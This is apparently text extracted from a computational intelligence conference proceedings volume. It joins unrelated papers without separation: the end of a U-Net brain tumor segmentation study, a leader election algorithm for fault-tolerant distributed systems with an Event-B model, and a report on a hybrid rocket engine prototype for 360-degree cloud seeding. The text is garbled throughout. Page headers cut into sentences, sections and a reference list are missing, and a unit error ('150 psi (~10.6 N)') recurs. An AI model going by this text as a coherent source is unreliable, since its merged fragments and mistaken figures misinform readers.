This paper presents an approach to brain tumor detection and segmentation using the U-Net CNN on both HGG and LGG cases, and it proves more efficient than previous unsupervised and supervised methods based on conventional machine learning techniques. Data augmentation decreased the training time to a large extent, enabling training to complete in 2–3 days. A test accuracy of about 90% was achieved. In the future, this work could be extended to take the MRI image of a brain with a tumor and find the size of the tumor as well as its type and stage; to achieve this, a 3D U-Net would be used in place of the conventional U-Net. MultiRes U-Net can also be used instead of the classical U-Net to obtain better results: certain convolutional layers of the U-Net are replaced with convolutional blocks from the Google Inception-V3 convolutional neural network, and the skip connections used in residual networks allow the features from previous layers to be reused alongside the features obtained after convolution. A generative adversarial network (GAN) can be used to generate synthetic images of increased contrast, which can then be used for segmentation to obtain better results. Dense-Vnet can be used to harness the benefits of both DenseNet and U/V-Net: DenseNet contains skip connections that make both the original features and the features obtained after each layer available for training, while U/V-Net follows an encoder–decoder path, and combining both should produce better results. Finally, a smaller CNN, found by trial and error, may give results as good as those of DenseNet or U-Net.
References
1. Wang, J., & Perez, L. (2017). The effectiveness of data augmentation in image classification using deep learning. Stanford University.
2. Ronneberger, O., Fischer, P., & Brox, T. (2015). U-Net: Convolutional networks for biomedical image segmentation. MICCAI.
3. He, K., Zhang, X., Ren, S., & Sun, J. (2015). Deep residual learning for image recognition. Microsoft Research.
4. Ibtehaz, N., & Rahman, M. S. (2019). MultiResUNet: Rethinking the U-Net architecture for multimodal biomedical image segmentation. Neural Networks.
5. Hamghalam, M., Lei, B., & Wang, T. (2020). Brain tumor synthetic segmentation in 3D multimodal MRI scans.
6. Ranjbar, S., Singleton, K. W., Curtin, L., Rickertsen, C. R., Paulson, L. E., Hu, L. S., Mitchell, J. R., & Swanson, K. R. (2020). Robust automatic whole brain extraction on magnetic resonance imaging of brain tumor patients using Dense-Vnet.
7. Liu, Z., Chen, L., Tong, L., Zhou, F., Jiang, Z., Zhang, Q., Shan, C., Zhang, X., Li, L., & Zhou, H. (2020). Deep learning based brain tumor segmentation: A survey.
8. Sun, Y., & Wang, C. (2020). A computation-efficient CNN system for high-quality brain tumor segmentation.
9. Liu, D., Zhang, H., Zhao, M., Yu, X., Yao, S., & Zhou, W. (2018). Brain tumor segmentation based on dilated convolution refine networks. In 2018 IEEE 16th International Conference on Software Engineering Research, Management and Applications (SERA).
10. Dong, H., Yang, G., Liu, F., Mo, Y., & Guo, Y. (2017). Automatic brain tumor detection and segmentation using U-Net based fully convolutional networks.
11. Adhikary, S., Pimpalkar, A., & Kendhe, A. (2016). Detection of brain tumor from MRI images by using segmentation and SVM. IEEE.
12. Sankari, D., & Vigneshwari, S. (2017). Automatic tumor segmentation using convolutional neural networks. In 2017 Third International Conference on Science Technology Engineering & Management (ICONSTEM).
13. Borase, Z. V., Naik, G., & Londhe, V. (2018). Brain MR image segmentation for tumor detection using artificial neural network. International Journal of Engineering and Computer Science (IJECS).
Leader Election Algorithm in Fault
Tolerant Distributed System
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 471
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_38
472 S. Verma et al.
centralized server running that service. In case of any fault, we must have a fault-tolerant system that can keep the service available. A fault-tolerant system executes algorithms to control the distributed system and keep certain services available in the presence of failures. The more failures a system can tolerate, the higher its resilience to failures and the more dependable it becomes [1].
Fault tolerance in a system can be provided by replication. State machine replication is a well-known approach for implementing fault-tolerant systems [2]. In such systems, the same data is replicated on different processors. These replicated processors are referred to as replicas, and algorithms are executed to coordinate clients' interaction with them. Replication of data objects improves a system's availability, but keeping the replicas identical is a complex process. It is believed that designating a single node as coordinator in a distributed system makes it easier to achieve coherency among replicas. The coordinator is also referred to as the leader or primary site of the system. Leader election is highly effective in improving performance and reducing the overhead of coordination among the other servers. The consensus protocols used in fault-tolerant distributed systems implemented through replicated state machines, such as PAXOS [3] and RAFT [4], are fundamentally based on leader election: a leader is elected, and the elected node instructs the other nodes in order to achieve consistency and coherency among replicas. Leader-based consensus algorithms synchronize replicated state machines to ensure that all replicas have the same view of the system state. Electing a leader in a distributed system is a difficult process, as coordination is required among processes to exchange information and reach an agreement. Each process must agree on a specific node as the leader of the system.
Along with classic leader election algorithms such as the Bully and Ring algorithms, several other algorithms have been proposed [5–7]. We propose a leader election algorithm in which timestamps and the ordering of messages are taken into consideration. The paper is divided into five sections: Sect. 1 is the introduction; Sect. 2 discusses the importance of message ordering; Sect. 3 presents the proposed algorithm; Sect. 4 gives a formal model of the proposed algorithm in Event-B, developed on the RODIN platform; and Sect. 5 states the conclusion and future scope of the proposed algorithm.
2 Message Ordering
When, on a logical link between two nodes, messages may be delivered in any order rather than in first-in, first-out manner, the execution is known as non-FIFO; in a FIFO execution, messages are delivered in first-in, first-out order. Non-FIFO and FIFO executions are shown in Fig. 1a, b, respectively.
In a causally ordered execution, suppose we have two send events S and S′ that are causally related (not merely ordered by physical time); then their receive events R and R′ must occur in the same order at all common destinations. Causal ordering is trivially satisfied when the two send events S and S′ are concurrent (not causally related). Figure 2a shows an execution that follows causal order. In Fig. 2b, causal order is violated by the execution, since s1 ≺ s2 but r2 ≺ r1 at P1 (the common receiver). In Fig. 2c, the execution satisfies causal order because the send events are not causally related. To enforce causal order in Fig. 2b, message m2 must be kept waiting at P1: since s1 ≺ s2, m1 must be delivered before m2 at P1.
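One standard way to enforce this "keep the message waiting" rule is with vector clocks, in the style of Birman–Schiper–Stephenson causal broadcast; the following is a minimal sketch of the delivery condition (our illustration, not the paper's own mechanism):

```python
def can_deliver(v_msg, v_local, sender):
    """Deliver the message with vector timestamp v_msg from `sender` at a
    process whose delivery state is v_local only if (a) it is the next
    message expected from the sender, and (b) every message it causally
    depends on has already been delivered here."""
    if v_msg[sender] != v_local[sender] + 1:
        return False
    return all(v_msg[k] <= v_local[k]
               for k in range(len(v_msg)) if k != sender)

# m1 from P0 (timestamp [1,0,0]) is deliverable at a fresh process, while
# m2 from P1 (timestamp [1,1,0]) must wait until m1 has been delivered.
print(can_deliver([1, 0, 0], [0, 0, 0], 0))  # True
print(can_deliver([1, 1, 0], [0, 0, 0], 1))  # False
```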
Fig. 5 Process execution of the proposed algorithm with total and causal ordered delivery of
messages
Fig. 6 Process execution of the proposed algorithm with total and causal ordered delivery of
messages
Elect Message: When the requesting site (the sender of the request message) receives a majority of responses, it broadcasts a leader-elect message to declare itself the leader.
Relinquish Message: When the elected leader completes its task, it broadcasts a relinquish message to let the other sites know that it has finished and that they may initiate the leader election process.
Execution of the proposed algorithm with causal ordering and total ordering is shown in Figs. 5 and 6. We consider three processes P1, P2 and P3 running on different sites in the system. Let P1 initiate the process by broadcasting a request message m1; on receiving the request, the other sites acknowledge it and send an accept message m2, so events e21 and e31 are causally preceded by event e11. If any other site that has already accepted a request message wants to initiate the election process, as in Fig. 5 where P3 sends request message m3, this is permissible and the request should be accepted by the other sites. Since events e31 and e32 are causally related, the accept message m2 must be delivered before the request message m3 at their common destination, i.e., P1, according to causal ordering. In Fig. 5, event e14, which shows delivery of message m2 (dotted line) after delivery of message m3, is therefore not acceptable. The request message m3 must wait until the previous request is fully processed by the requesting site.
Leader Election Algorithm in Fault Tolerant … 477
The next part of the execution is shown in Fig. 6. Whenever the requesting site receives a majority of the votes (i.e., M/2 + 1, where M is the number of sites), it broadcasts a message m4 claiming itself the leader of the system (event e16 in Fig. 6). P1 acts as the leader of the system until it sends a relinquish message m5 to all the sites through event e17. The message m5 notifies the other sites that the previous leader has completed its task and that there is currently no designated leader in the system. Now the sites will acknowledge request messages from other sites (i.e., message m2) and send an accept message m6 (events e18 and e24). The events e16, e17, e18, and e24 are causally related to each other.
If two processes send request messages concurrently (at the same logical time), i.e., the messages are not causally related, then the ordering of the events is ensured by total order broadcast. In Fig. 7, both send events of processes P1 and P3 are concurrent and follow total ordering at the time of delivery; hence event e13′ (shown by the dotted line) is not acceptable at process P1. In this scenario, P3 will be elected leader, as discussed in the algorithm, since its request is received first by processes P1, P2, and P3 through events e12, e21 and e32, respectively.
After a leader election process has been executed, each node should recognize a particular node as the leader for the task. The nodes communicate among themselves to decide which one of them will enter the leader state; each node has an equal opportunity of electing itself as the leader. The leader election problem can thus be seen as the problem of each node deciding whether or not it is the leader, under the constraint that exactly one node must decide that it is. The liveness property states that each processor must eventually be in one of two states, elected or not elected as leader; the safety property states that in every execution exactly one node becomes the leader and the rest determine that they are not elected. The basic properties of such an algorithm are achieved in the proposed algorithm in the following manner:
Termination: The algorithm completes its execution in finite time, and one node is elected as the leader.
Uniqueness: Exactly one node claims itself the leader of the system at a particular time.
Agreement: All other nodes know about the elected leader and agree on the election outcome.
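The majority test and the total-order tie-break for concurrent requests described above can be sketched as follows (illustrative only, with the message plumbing omitted; the function names are ours):

```python
def has_majority(accepts, m):
    # A requesting site may broadcast the leader-elect message once it has
    # collected a strict majority, M // 2 + 1, of accept responses.
    return len(accepts) >= m // 2 + 1

def winner(requests):
    # Concurrent requests are totally ordered by (timestamp, site id);
    # the request delivered first everywhere wins, as P3 does in Fig. 7.
    return min(requests)[1]

print(has_majority({'P2', 'P3'}, 3))   # True: 2 >= 3 // 2 + 1
print(winner([(5, 'P1'), (3, 'P3')]))  # P3
```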
4 Modeling Approach
Event-B [11, 12] is a formal technique that precisely describes the possible behavior of a system mathematically, in an unambiguous manner. The problem is described in an abstract model, followed by refinement levels that introduce more detailed specifications. Event-B has two components, Machine and Context: the Machine is the dynamic part of the model, while the Context is the static part. The Machine provides the behavioral properties of the model; it contains the variables, invariants, theorems, and events. The events have guards and actions, and at each refinement level these guards are strengthened. The variables must satisfy the invariants, and the invariants must be maintained by the activation of events. RODIN [13] is an industrial-strength Event-B tool that provides automated proof support: it generates proof obligations and discharges them. Event-B has been used extensively in the formal verification of the behavioral properties of distributed systems. Event-B specifications of global causal ordering for fault-tolerant transactions and of total order broadcast for distributed transactions on the RODIN platform were presented in [14, 15], respectively. In [16], a formal approach to the modeling and verification of distributed transactions for replicated databases was presented. In the design of a distributed system, liveness and safety are two important issues to deal with. With respect to safety, RODIN generates proof obligations; to ensure that models are live and make progress, [17] proved that Event-B models are non-divergent and enabledness-preserving. Security-critical systems are also modeled using Event-B: [18] presents an incremental development in Event-B of the Mondex electronic purse (used for financial transactions).
(i) Abstract Level: In the abstract-level machine, we model the basic objective of the algorithm. In the proposed algorithm for leader election (LEOD), we assume that there is a set of sites among which a leader has to be chosen. In the context, we define a finite carrier set SITE. In the machine, we declare a variable leader that belongs to the power set of SITE and is assigned non-deterministically by the execution of the event ElectLeader. The event executes only if there is no prior leader in the system.
MACHINE LeaderM
SEES LeaderC
VARIABLES s, leader
INVARIANTS s ∈ SITE, leader ∈ P(SITE)
EVENTS
INITIALIZATION
THEN leader := ∅, s :∈ SITE
END
ElectLeader
WHEN leader = ∅
THEN leader := {s}
END
END
(ii) First Refinement Level: In the first refinement level, new variables and events are introduced. The proposed events in this refinement level are the following:
(a) Request_Vote: Whenever a site wants to become the leader of the system, it broadcasts a timestamped request message by executing this event.
(b) Receive_RequestVote: This event marks the delivery of the request message at the other sites.
(c) Response_Request: Through this event, a site sends its response to the requesting site.
(d) Response_Receive: This event signifies that the response of a particular site is delivered at the requesting site.
(e) ElectLeader: This abstract-level event is refined at this level: when the requesting site receives a majority of responses, it declares itself the leader and broadcasts a message notifying the other sites.
(f) Leader_Release: After the elected leader completes its task, it broadcasts a relinquish message through this event.
(g) Receive_LeaderRelease: The delivery of the relinquish message at the other sites is marked by this event.
References
Abstract Water, being a necessity in various forms, is always in demand for power generation, drinking, cultivation, and farming, and is hence a crucial asset for humanity. Many regions are still short of water and receive an irregular supply. As the population increases, the need for water for daily use and other necessary purposes will grow drastically. One of the major problems arising from water scarcity is in agriculture, where lack of water affects crop yields and survivability. To address these problems, we propose and implement a novel technique of rocket-based 360-degree cloud seeding to enhance artificial rain, using an autonomously landing rocket and various machine learning concepts covering reinforcement learning and supervised and unsupervised learning. In this paper, we test and analyze the first phase of the proposed technique, reporting results on the design and application of that phase.
1 Introduction
Water is the most important support system for sustaining life on Earth. Various sources of water, such as rivers, groundwater, and reservoirs, are on the verge of depletion due to the ever-increasing demands of a rising population. To meet these demands, many countries attempt to make artificial rain to increase the probability of rainfall. Though the rain enhancement method has multiple impacts,
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 481
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_39
482 S. Shukla et al.
at many times, it has proven to be a better option than little or no rain at all. Implementing various innovations and inventions, several methods and technologies, such as planes, drones, ground generators, electricity, lasers, and rockets, are used where rainfall is insufficient. Among the many rain enhancement techniques, cloud seeding can be defined as a process that accelerates rain formation by providing additional nuclei around which water droplets can accumulate and condense. Cloud seeding helps in hail suppression, decreasing the overall size of hailstones and thus minimizing the damage when they hit the ground, and it provides protection against crop damage, temperature control, pollution control, drought control, etc. [1, 2]. It helps agriculture flourish, covering every benefit mentioned earlier: preventing crop damage, controlling temperature (which speeds up the germination of plants), and providing water as rain. The more water is available, the more trees and plants grow, so the cycle of gas exchange becomes stable and yields improve. Other applications include preventing flooding or ponding damage to crops, which require oxygen for respiration [3]. The applications of cloud seeding in agriculture are endless and yet to be implemented completely.
Beyond traditional methods and applications, cloud seeding is still being researched today. One of the latest feasibility tests of cloud seeding was conducted in the Yadkin river basin, North Carolina (US) [4], using airborne and ground-based seeding in different climatic conditions to increase hydropower energy (clean energy) from project dams. Similarly, the UAE recently applied cloud seeding, conducting a three-month-long campaign in 2020 with a total of 95 cloud seeding missions by the National Center of Meteorology (NCM), based on the results of previous missions [5]. Not far behind, China has used, and is still using, cloud seeding methods to combat water shortages, which may add 60 billion cubic meters of additional rainfall [6]. Suffering from water shortage, China devised cloud seeding as a solution. Its new charged-particle (negative ion) cloud seeding technique uses no conventional seeding chemicals; ion-based cloud seeding is cleaner, more beneficial, environmentally friendly, and economical to operate on a large scale. However, it remains research yet to be carried out in the field [7].
Recent studies of cloud seeding have examined the process and its enhancement in different climate regions. Various countries, such as the UAE, Thailand, and Serbia, are using more efficient enhancement agents, such as core/shell sodium chloride (NaCl)/titanium dioxide (TiO2) nanostructures (CNST), instead of earlier agents such as plain NaCl seeding. Results show that CNST is a more efficient and powerful precipitation enhancer, depending on humidity levels and areas [8]. In addition, recent research at the University of Colorado at Boulder quantifies snowfall [9] from orographic cloud seeding for increasing mountain snowpack, using a radar dish to measure snowfall, and experiments with high-voltage corona discharge in the formation of rain and snow [10]. The solutions offered by cloud seeding have grabbed the world's attention, yet in countries like India cloud seeding projects are not implemented to their full potential because of the history of such projects there. Recent activities have come into consideration,
Engine Prototype and Testing Measurements of Autonomous … 483
like Karnataka’s climate modification projects [11] which are of previous projects
and seem it will end soon. Weather modification has not been developed and well
implemented in India due to a lack of implementation, interest, and involvement of
government or private weather agencies in weather-related projects. Yet is a variable
option for future needs. All solutions seem to have some potential to provide a solu-
tion toward water problems for now, and in the future, yet it is to be considered that
playing with Mother Nature is not the best option. We need a controlled pattern and
plan to practice these techniques but under control.
Among the many cloud seeding approaches, countries, companies, and agencies are using rockets, with an innovative network of artificial intelligence-enabled strategic micro-rocket launches and a distributed grid of climatic sensors and spreading technologies for cloud seeding. For example, ACAP Striyproekt's "LOZA" missile protection system is designed for actively affecting clouds by spraying chemical reagents, among other purposes [12]. The Nashik rocket project in India, launching 1000 rockets to induce artificial rain, used a similar technique for cloud seeding [13]. The rockets are launched from the ground with a missile launcher vehicle to target clouds near the ground. This makes them well suited to targeting nearer clouds but reduces the area covered when conditions do not favor the technique. These missiles follow a trajectory from the ground to the cloud for seeding and finally fall back to the ground. Such rocket methods are practical for small projects, which makes them the least appropriate option at scale, though they have great potential.
Improving on the trajectory concept, the novel 360° cloud seeding approach is a new, highly efficient, pattern-forming approach that maximizes coverage per seeding [14]. This reduces costs and increases the probability of rain formation as well as efficiency. The rocket heads toward the center of the targeted cloud and hovers for a while to compute the necessary details. After full assurance of its surroundings and stability, it opens the umbrella mechanism (Fig. 2) and spreads seeding agents by shooting four smaller rockets in all four directions (Fig. 3). The rocket then heads back to the ground, landing itself so as to be ready for targeting other clouds. Meanwhile, if the previous cloud needs more seeding, the rocket follows the approach described above but changes its orientation relative to the previous four directions; this produces a circular seeding process that seeds the cloud in one pass rather than the conventional method of stripes in a row (Fig. 1) [14].
Figure 1 shows the conventional methods used by planes, drones, etc., which spread seeding agents into a single cloud in a multiple-stripes pattern. Among conventional, present-day technologies, this type of seeding is considered the best option so far, as it ensures a higher probability of rainfall than the other methods in use.
484 S. Shukla et al.
Even though this is the best option so far, and alternative methods are being developed, the procedure of plane-based cloud seeding reduces efficiency and rapidly increases time and cost.
Figure 2 shows the umbrella mechanism in action; it acts as a launching platform for the smaller rockets, enabling stable, directional liftoffs. During the hovering period, the arms open to 90° each, and the thrust platform provides an action–reaction surface so the smaller rockets can gain maximum speed as they shoot into the clouds in a
controlled direction. Four smaller rockets carrying seeding agents as fuel lift off into the clouds to complete the task of 360° cloud seeding.
Figure 3 shows the 360° pattern, or orientation, that spreads the seeding agents in all four directions. As mentioned for Fig. 2, the smaller rockets are launched in specific directions for variable seeding. The directions in the figure can be changed to any four directions within 360° using thrust vectoring and a reaction control system (RCS) [12] for active real-time control, increasing the effectiveness of seeding and the probability of rain.
The rocket-based cloud seeding method (report paper) uses machine learning to make the whole concept feasible in a real environment. It uses:
• Reinforcement learning (RL) [16]: Reinforcement learning (Fig. 4) is a branch of machine learning (ML) whose core idea is to imitate human real-time intelligence, acting and reacting (by reflex) on the basis of experience and real-time response to any problem-solving activity, involving an environment (surroundings), an interpreter (humans), an agent (the rocket), and actions (reactions). This concept is used in our
Fig. 4 Reinforcement learning
define the working of the rocket. It lies more on the software side and is used by the navigation system to communicate and decide the best course of action. Changes in direction are made via mechanical inputs through TVC and RCS, producing small deviations that create torque and steer the rocket to the correct state vector under the control of the algorithms. The software is also responsible for mission abort if anything goes wrong.
The process starts with the liftoff of the rocket from the ground, fully equipped
and with all necessary and predictable maneuvers planned. The on-board computer
starts taking all data and decisions. At a point in the middle of the flight trajectory,
cloud tracking systems begin sending detailed data and suggestions about the humidity
level and its positioning in 3D space to the ground control center, which makes the
final decision on the course of action. Once the targeted cloud has been entered,
the rocket gives a final signal before starting the seeding process, checking its
orientation so that the mechanism can activate by pressurizing the hydraulic
pistons. Meanwhile, the on-board computer continuously stabilizes the hovering rocket
using TVC and RCS against disturbances. Reinforcement learning controls every possible
factor from liftoff to landing. While the rocket hovers, the umbrella
mechanism [12] opens its arms and ignites the seeder rockets, using both TVC and
RCS to counterbalance the seeders' thrust in all four directions. The rocket then
descends, using radar to determine the descent speed and the umbrella-mechanism
arms as active air brakes to slow down, and finally TVC and RCS slowly
land the rocket on the ground. The seeder rockets either are destroyed during the
seeding process or land on the ground using parachutes, transmitting their location
to the control stations so they can be collected. All these steps, maneuvers, and data
exchanges work so fast that the total process takes only a few minutes to complete.
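The flight profile above can be summarized as a simple phase sequencer with an abort hook, matching the text's note that the on-board software can abort if anything goes wrong. The phase names and the check-based interface are illustrative; the paper does not specify the on-board software at this level of detail.

```python
# Ordered mission phases, as described in the flight sequence above.
PHASES = [
    "liftoff",
    "ascent",
    "cloud_tracking",       # ground control confirms the target cloud
    "seeding",              # umbrella arms open, seeder rockets fire
    "stabilized_hover",     # TVC + RCS counterbalance the seeders' thrust
    "braked_descent",       # umbrella arms reused as active air brakes
    "powered_landing",
]

def run_mission(checks):
    """Advance through phases; any failed health check aborts the mission."""
    completed = []
    for phase in PHASES:
        if not checks.get(phase, True):
            return completed, "ABORT"
        completed.append(phase)
    return completed, "LANDED"

done, status = run_mission({})                     # nominal flight
aborted, status2 = run_mission({"seeding": False}) # e.g. bad orientation
```

In the nominal run every phase completes; with a failed check, the sequencer stops before the failing phase, which is where a real controller would trigger the abort maneuvers.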
Materials Used: Polymethyl methacrylate (PMMA) fuel grain, O2 tank for the oxidizer,
switch valves, pipes, an 8 × 8 × 8 inch aluminum block for the nozzle and two 8 × 2
× 8 inch aluminum slabs for the supporting engine cover, aluminum rings (12 inches),
a pressure gauge, 0.5-inch screws, rubber inner walls, and miscellaneous items.
Figure 7 explains the fuel and oxidizer flow. The oxidizer is released into the
fuel through an inlet at 150 psi (~10.6 N), initiating a chemical reaction inside the
combustion chamber; with the temperature raised by ignition, the fuel starts burning
in the excess oxygen (O2). Pressure in the combustion chamber increases due to the
expansion of particles and gases, and a large amount of thrust escapes from the rocket
nozzle, propelling the rocket forward.
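The flow just described ties to the standard rocket thrust relation: momentum flux plus a pressure term at the nozzle exit. The mass-flow rate, exhaust velocity, and exit area below are illustrative assumptions, chosen only so that the matched-pressure case reproduces the ~49 N maximum thrust reported later in the testing section.

```python
def thrust(mdot, v_e, p_e, p_a, a_e):
    """Ideal rocket thrust: F = mdot * v_e + (p_e - p_a) * A_e (SI units)."""
    return mdot * v_e + (p_e - p_a) * a_e

# Matched expansion (p_e == p_a, the ideal case of Fig. 16 later):
# the pressure term vanishes and thrust is just momentum flux.
f_matched = thrust(mdot=0.025, v_e=1961.2, p_e=101325.0, p_a=101325.0, a_e=1e-3)
# f_matched is about 49.03 N, i.e. roughly 5 kgf
```

When the nozzle over- or under-expands the exhaust (p_e ≠ p_a), the second term subtracts from or adds to the momentum term, which is why matched expansion gives the best thrust for a given chamber condition.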
Figure 8 shows the engine layout, including an inlet for the oxidizer, a pre-combustion
chamber for increasing the flow of the oxidizer, the fuel grain (PMMA), and a post-
combustion chamber for increasing the region of combustion before exiting through
the nozzle. All parts combined form the engine section of the hybrid rocket system
[15]. This system is optimal for real-time control over accidents, ensuring safety,
efficiency, and reduced internal and external damage to the rocket.
Figures 9 and 10 show the side and top views of the engine prototype, with an inlet
for the oxidizer, regulators, a skeleton frame, the fuel grain (PMMA), and the nozzle.
Figure 11a describes the theoretical nozzle design, made of aluminum and machined
on a CNC for accurate construction. It includes three parts: the combustion
chamber, where the expansion of fuel takes place by mixing the oxidizer with the fuel
and igniting it; the throat, which compresses the expanded gases to an extreme velocity;
and the exit, through which the gases are released, moving the rocket forward
against gravity.
Figure 11b is the actual nozzle design. It includes a contraction that makes the
expanded gases gain extreme exit speed as they move toward the throat for
the highest possible compression by decreasing the flow area, increasing exit
pressure, force, and expansion, which gives maximum thrust and efficiency.
Figures 12 and 13 show the physical model of the nozzle, produced by applying the
design layout on a CNC machine. The nozzle has a mass of 1.5 kg, as it is designed
with the upcoming phases in mind. During those phases, the designs will be refined
using 3D design tools, simulation, and rendering.
4 Testing Results
In this section, we will present the testing results of the rocket-based cloud seeding
mechanism. As rocket testing was conducted in different phases, we will elaborate
in detail on each phase in this section.
Engine Prototype and Testing Measurements of Autonomous … 491
• Ignition phase: Figure 14 showcases the fuel burning with the oxidizer and
igniting to reach the temperature desired for maximum thrust, burning out irreg-
ularities in the design and fuel along the way. It shows contraction, compression,
and expansion taking place; the initial expansion is one of the most crucial parts
of thrust build-up, ensuring constant thrust, and demonstrates the robustness and
practicality of the design. This is one of the most important phases, as it ensures
the safety, adaptability, and strength of the design to handle the force exerted by
the internal expansion of fuel and oxidizer. If this phase fails, the design is
considered fatal and must be redesigned immediately. Our prototype was built for
these internal pressures, which resulted in a successful ignition phase, ensuring
that the prototype was safe and suitable for higher pressures in the next phase.
• Leveling-up thrust phase (rise to maximum temperature): As the ignition
phase was safely executed, the prototype moved to the next phase to withstand an
even greater amount of pressure. As shown in Fig. 15, leveling up was performed
to reach the maximum temperature and pressure for full thrust. This phase examines
the design in terms of calculation (pressure/force), ability to withstand the rise
in temperature, structural integrity, application of the design, and its composition.
It checks engine efficiency and tests the engine to its maximum potential. At a
certain pressure, the thrust becomes constant for a certain time; it thus reaches
its maximum potential and then decreases as the inlet pressure decreases and becomes
constant. At 150 psi (~10.6 N), the thrust of the prototype became constant and
started decreasing slightly, as the oxidizer inlet to the engine was limited and
the exit pressure was increasing immensely.
Fig. 15 Fuel at its maximum ignition temperature level for laminar flow
• Maximum thrust and pressure phase: The maximum pressure and temperature arc,
along with over-expanded thrust, results in the maximum thrust provided by the
engine. Figure 16 shows the ideal situation p_a ≈ p_e, the maximum thrust of
49.03 N (≈5 kgf) and pressure, and the first curve of diamond thrust. This phase
is connected to the leveling-up temperature phase, as it lasted only around 7–8 s
before the structural strength of the engine weakened when the temperature arc
reached the area near the inlet. This shows that our design had some flaws near
the inlet (the pre-combustion protection cover was damaged by the temperature
rise). The flaws are attributed to the unavailability of good insulators for
protection, itself the result of various external and miscellaneous factors.
After this result, the prototype was shut down by cutting off the oxidizer flow
into the engine. Even though the result was not perfect, it showed the advantage
of a hybrid engine, which gives full control to abort the test if something goes
out of control.
Final phase: After 7 s of burn time, the rise in pressure and temperature started
melting the body (aluminum) along with the seal near the oxidizer inlet, as shown
in Fig. 17. Even though the body was damaged during the temperature arc, the
nozzle showed no damage or melting. The test was complete, with the result that many
things had to be reconsidered, such as the inlet pressure, nozzle, material selection,
weight reduction, sealing, and the overall design. A few things did not go according
to plan, which is fine, as things are unpredictable in rocket science. After some
debugging of the design, the same engine will be practical for scaling up the
prototype. The test was a success, giving us the necessary details and data on
various factors and prompting a rethink of the design factor and safety. It also
showed that reusability of the rocket engine is possible: during the test, external
factors were the only unpredictable elements, which suggests that after multiple
iterations the final result will help reduce the overall cost of transporting the
umbrella mechanism and seeders to their final position in the clouds, and the engine
will be reusable for the next launch. Small steps and iterations toward the final
rocket engine will provide the most efficient transporter of the seeders. The next
test will use the new, improved reusable engine with far more thrust.
Figure 18 shows the ideal case of rise in altitude with respect to time for this
prototype, given a thrust-to-weight ratio TWR > 1 and higher efficiency; the rocket
appears to rise exponentially. In reality, the current stage was not able to show
such theoretical results. This means the design of the prototype was not up to the
mark, with factors such as excess weight and insufficient thrust (TWR < 1); as shown
in the graph, it takes a long time to overcome its inertial mass and gain upward
momentum against gravity (Fig. 19). The more time it takes to gain momentum and
cover altitude, the less fuel it has left to continue the trajectory. With better
material selection and engine efficiency, the altitude gain will become proportional
to time.
Figure 19 shows the graph of thrust versus acceleration. The prototype was able to
give 49.03 N of thrust, which was not sufficient to achieve TWR > 1; thus, the
acceleration was −7.8 m/s² at 49.03 N. The negative acceleration turned positive
at around 250 N of thrust, and to make the rocket move it was necessary to overcome
g = 9.8 m/s² for liftoff.
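The numbers above can be cross-checked with Newton's second law. The rocket's mass is not stated in the text; the ~24.5 kg below is inferred from the reported thrust (49.03 N) and acceleration (−7.8 m/s²), so treat it as an assumption rather than a quoted figure.

```python
G = 9.8  # gravitational acceleration, m/s^2

def net_acceleration(thrust_n, mass_kg):
    """a = (T - m*g) / m : positive only once TWR = T/(m*g) exceeds 1."""
    return (thrust_n - mass_kg * G) / mass_kg

# Solve a = T/m - g for m using the reported test point (inferred mass):
mass = 49.03 / (G - 7.8)                    # ~24.5 kg
a_at_test = net_acceleration(49.03, mass)   # ~ -7.8 m/s^2, as in Fig. 19
liftoff_thrust = mass * G                   # ~240 N: the TWR = 1 threshold,
                                            # consistent with "around 250 N"
```

This inferred TWR = 1 threshold of roughly 240 N agrees with the graph's crossing point near 250 N, which supports reading the negative acceleration as a simple thrust deficit rather than a measurement artifact.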
Figure 20 shows the graph of propulsion efficiency versus equivalent velocity. The
propulsion efficiency shows irregularity because the oxidizer pressure through the
inlet (150 psi ~ 10.6 N) was constant and lower than what was needed.
Fig. 20 Propulsion efficiency (η_p) versus equivalent velocity (m/s) graph of the rocket
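The efficiency-versus-equivalent-velocity curve of Fig. 20 follows the classic propulsive-efficiency relation, sketched here under the assumption that the paper uses the standard definition (the text does not state its formula explicitly).

```python
def propulsive_efficiency(v_vehicle, c_equivalent):
    """eta_p = 2*(v/c) / (1 + (v/c)^2); peaks at 1 when v equals c."""
    r = v_vehicle / c_equivalent
    return 2.0 * r / (1.0 + r * r)

peak = propulsive_efficiency(1500.0, 1500.0)   # 1.0 exactly at v = c
low = propulsive_efficiency(150.0, 1500.0)     # far below c: inefficient
```

The curve is symmetric in the ratio v/c (flying at half or double the equivalent velocity gives the same efficiency), so a rocket that never approaches its equivalent exhaust velocity, as in this low-thrust test, sits on the inefficient left side of the curve.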
5 Result Discussion
This overall experiment with the phase-1 rocket prototype gave results close to the
calculations made in our previous work. The final phase ran at its extreme level and
was in danger of explosion and flame burst-out. The results showed a payload capacity
of 3.94 kg without any external forces such as drag, air density, and gravitational
pull, as the test was done horizontally, which means the usable payload would have
been even lower. Apart from this, the availability of raw materials for the rocket
design was a major problem that unexpectedly added 10 kg of unnecessary weight to
the overall mass of the rocket. Challenges may occur unexpectedly; some are easy to
tackle, while others are variable and can occur at any instant. Mechanical
challenges: the operation and wear and tear of valves and other mechanical/hardware
parts; engine failure; and leaks around seals when dealing with the combustion
pressure in the engine chamber. Variable challenges: other challenges that mostly
affect the development or initial stage, such as the availability of raw materials,
design, the computational power of computers, sensors, budget problems, and
developing new optimization techniques. All static-test problems occurred during
the initial stage of rocket development and fall under the challenges above.
6 Conclusion
The Novel Umbrella 360 Cloud Seeding Based on Self-Landing Reusable Hybrid
Rocket will be one of the best available solutions for cloud seeding in terms of
efficiency, reusability, cost, and versatility. In this report, the testing phase
has been explained, along with its applications and the challenges faced in
structural design, assembly, temperature management during testing, thrust,
calculations, and the results. The current phase can be classified as 60% according
to plan and as proof of scalability. This prototype shows the potential of
rocket-based cloud seeding to be a successful approach so far. During scale-up,
this approach might become the best solution among rain-making methods; that will
be decided as things go according to plan toward the final and most efficient
rocket-based weather modification system.
7 Future Scope
References
6. China sets 2020 “artificial weather” target to combat water shortages, East Asia News & Top
Stories—The Straits Times. https://www.straitstimes.com/asia/east-asia/china-sets-2020-artifi
